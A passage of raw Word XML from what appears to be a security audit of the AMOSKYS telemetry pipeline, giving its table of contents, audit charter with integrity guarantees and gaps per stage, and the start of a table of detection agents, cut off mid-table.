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7C28C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="600"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022F5D17" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>AMOSKYS Operational Deep Audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E12E1F1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Complete Telemetry Lifecycle Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6572C94C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Axon → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EventBus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> → WAL → Enrichment → Correlation → Cortex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA144D8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68DB034F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>February 24, 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351ADCAB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Confidential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62906655" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094"/>
    <w:p w14:paraId="58B2BF64" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>TABLE OF CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C654A79" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 0 — AUDIT CHARTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E6FA6B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 1 — AGENT LAYER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C21BB62" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 2 — EVENTBUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551E5047" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 3 — WAL LAYER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FA9E0C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 4 — ENRICHMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578DD533" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 5 — CORRELATION ENGINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7738F11F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 6 — CORTEX / WEB LAYER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E872C2B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 7 — GOLDEN ATTACK SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B65BD8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 8 — HARDENING METRICS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EE285D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 9 — GAP PRIORITIZATION MATRIX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538F48C9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094"/>
    <w:p w14:paraId="3AE81F10" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 0 — AUDIT CHARTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC6CB2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>What is an "event" in AMOSKYS?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE2D83B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>protobuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-serialized message (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UniversalEnvelope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) containing timestamped telemetry from an agent, wrapped with integrity fields (Ed25519 signature, BLAKE2b hash chain), routed through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRPC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EventBus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, persisted in WAL, and processed into domain-specific tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8E3B1A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Canonical Event Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277E5566" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>FlowEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (network), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProcessEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (process), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceTelemetry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (device metrics), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecurityEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (threat detection), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AuditEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>syscall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PersistenceEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (boot persistence), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FIMEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (file integrity), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (DNS resolution), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PeripheralEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (USB/hardware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349EF4C2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Minimum Atomic Telemetry Unit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512093FD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A single </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UniversalEnvelope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with: version, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts_ns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (nanosecond timestamp), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>idempotency_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dedup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">), payload (one of the event types above), sig (Ed25519), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prev_sig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (chain link), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>schema_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DA1EC2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Integrity Guarantees per Stage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDAEE1D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Agent → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EventBus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Ed25519 envelope signature (defined but NOT enforced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEDAF1E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EventBus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> → WAL: BLAKE2b checksum + hash chain (ENFORCED on write)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0563F0FD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>WAL → Storage: Chain verification + quarantine on break (ENFORCED on read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6620BA47" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>Storage → Cortex: No integrity verification (GAP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1097219E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>Cortex → User: No hash display, no chain verification (GAP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F16C7D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>Out of Scope: Windows-specific attacks, cloud infrastructure, container orchestration, network tap/packet capture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DBB2D5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F684A6E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094"/>
    <w:p w14:paraId="1EFC2884" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 1 — AGENT LAYER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAB1F87" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 Agent Capability Matrix</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5006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2"/>
        <w:gridCol w:w="566"/>
        <w:gridCol w:w="643"/>
        <w:gridCol w:w="1201"/>
        <w:gridCol w:w="2267"/>
        <w:gridCol w:w="2056"/>
        <w:gridCol w:w="1224"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA1094" w14:paraId="68703228" w14:textId="77777777" w:rsidTr="00F308F7">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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21E55423" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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75D9913D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Probes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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36A5B8C9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Interval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641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0EAED8F4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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64C5CBA0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Execution Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="109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1321A1CE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Key Strength</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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0C4905CD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Key Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="3947DE5D" w14:textId="77777777" w:rsidTr="00F308F7">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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3411A93" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>AuthGuard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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3A53E69" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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5582726" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>30s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641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1E2B0F3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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0AB3371" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Log tailing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="109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2E155BC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Brute force, password spray</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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9A2E56A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>GeoIP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> on auth events</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="66E799D4" w14:textId="77777777" w:rsidTr="00F308F7">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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52A5ADF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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4ECE2A0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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EBEBDC9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>10s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641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683A18F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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2D9C71D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>psutil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> polling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="109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7B8670C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Spawn detection, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>LOLBin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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8560417" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>System process visibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="558B3B61" w14:textId="77777777" w:rsidTr="00F308F7">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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E05520D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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D29961E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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F70A4C3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>300s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641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F6D9897" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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A83CB32" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Snapshot diff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="109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D171E0D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>LaunchAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, SSH keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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AE886E1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">No Linux </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>systemd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="5EE88A12" w14:textId="77777777" w:rsidTr="00F308F7">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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971E9AE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>FIM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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21E9234" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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9DB8E22" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>300s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641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6E8A5DE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>macOS+Linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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62FF543" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Tree walk + hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="109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8E0ED59" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Hash+permission+owner</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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7FE394A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SELinux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xattr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="5A8601F2" w14:textId="77777777" w:rsidTr="00F308F7">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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A05CB9A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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B609E79" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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4AC6564" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>30s</w:t>
            </w:r>
          </w:p>
